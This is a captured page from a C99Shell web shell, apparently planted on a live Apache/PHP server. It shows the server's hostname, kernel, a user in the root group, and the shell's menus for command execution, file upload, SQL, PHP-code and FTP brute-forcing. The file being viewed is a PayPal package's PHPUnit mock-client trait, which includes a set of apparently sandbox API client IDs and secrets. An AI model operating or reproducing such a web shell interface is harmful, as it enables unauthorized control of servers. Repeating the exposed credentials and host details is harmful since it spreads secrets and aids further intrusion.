!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/smabpro.picotech.app/public_html/vendor/srmklive/paypal/tests/   drwxr-xr-x
Free 28.57 GB of 117.98 GB (24.22%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     MockClientClasses.php (4.15 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Srmklive\PayPal\Tests;

use 
GuzzleHttp\Client as HttpClient;
use 
GuzzleHttp\Handler\MockHandler as HttpMockHandler;
use 
GuzzleHttp\HandlerStack as HttpHandlerStack;
use 
GuzzleHttp\Psr7\Response as HttpResponse;
use 
GuzzleHttp\Psr7\Stream as HttpStream;
use 
GuzzleHttp\Utils;
use 
Psr\Http\Message\ResponseInterface;
use 
Srmklive\PayPal\Services\PayPal as PayPalClient;

trait 
MockClientClasses
{
    private function 
mock_http_client($response): HttpClient
    
{
        
$mock = new HttpMockHandler([
            new 
HttpResponse(
                
200,
                [],
                (
$response === false) ? '' Utils::jsonEncode($response)
            ),
        ]);

        
$handler HttpHandlerStack::create($mock);

        return new 
HttpClient(['handler' => $handler]);
    }

    private function 
mock_http_request($expectedResponse$expectedEndpoint$expectedParams$expectedMethod 'post')
    {
        
$set_method_name = ($this->setMethodsFunction() === true) ? 'onlyMethods' 'setMethods';

        
$mockResponse $this->getMockBuilder(ResponseInterface::class)
            ->
getMock();
        
$mockResponse->expects($this->exactly(1))
            ->
method('getBody')
            ->
willReturn(new HttpStream(fopen('data://text/plain,'.$expectedResponse'r')));

        
$mockHttpClient $this->getMockBuilder(HttpClient::class)
            ->{
$set_method_name}([$expectedMethod])
            ->
getMock();
        
$mockHttpClient->expects($this->once())
            ->
method($expectedMethod)
            ->
with($expectedEndpoint$expectedParams)
            ->
willReturn($mockResponse);

        return 
$mockHttpClient;
    }

    private function 
mock_client($expectedResponse$expectedMethod$token false$additionalMethod null)
    {
        
$set_method_name = ($this->setMethodsFunction() === true) ? 'onlyMethods' 'setMethods';

        
$methods = [$expectedMethod'setApiCredentials'];
        
$methods[] = ($token) ? 'getAccessToken' '';
        
$methods[] = isset($additionalMethod) ? $additionalMethod '';

        
$mockClient $this->getMockBuilder(PayPalClient::class)
            ->{
$set_method_name}(array_filter($methods))
            ->
getMock();

        if (
$token) {
            
$mockClient->expects($this->exactly(1))
                ->
method('getAccessToken');
        }

        if (isset(
$additionalMethod)) {
            
$mockClient->expects($this->any())
            ->
method($additionalMethod);
        }

        
$mockClient->expects($this->exactly(1))
            ->
method('setApiCredentials');

        
$mockClient->expects($this->exactly(1))
            ->
method($expectedMethod)
            ->
willReturn($expectedResponse);

        return 
$mockClient;
    }

    private function 
getMockCredentials(): array
    {
        return [
            
'mode'    => 'sandbox',
            
'sandbox' => [
                
'client_id'     => 'some-client-id',
                
'client_secret' => 'some-access-token',
                
'app_id'        => 'some-app-id',
            ],
            
'payment_action' => 'Sale',
            
'currency'       => 'USD',
            
'notify_url'     => '',
            
'locale'         => 'en_US',
            
'validate_ssl'   => true,
        ];
    }

    private function 
getApiCredentials(): array
    {
        return [
            
'mode'    => 'sandbox',
            
'sandbox' => [
                
'client_id'     => 'AbJgVQM6g57qPrXimGkBz1UaBOXn1dKLSdUj7BgiB3JhzJRCapzCnkPq6ycOOmgXHtnDZcjwLMJ2IdAI',
                
'client_secret' => 'EPd_XBNkfhU3-MlSw6gpa6EJj9x8QBdsC3o77jZZWjcFy_hrjR4kzBP8QN3MPPH4g52U_acG4-ogWUxI',
                
'app_id'        => 'APP-80W284485P519543T',
            ],
            
'payment_action' => 'Sale',
            
'currency'       => 'USD',
            
'notify_url'     => '',
            
'locale'         => 'en_US',
            
'validate_ssl'   => true,
        ];
    }

    protected function 
setMethodsFunction(): bool
    
{
        
$useOnlyMethods false;

        foreach ([
'8.1''8.2''8.3'] as $php_version) {
            if (
strpos(phpversion(), $php_version) !== false) {
                
$useOnlyMethods true;
            }
        }

        return 
$useOnlyMethods;
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0039 ]--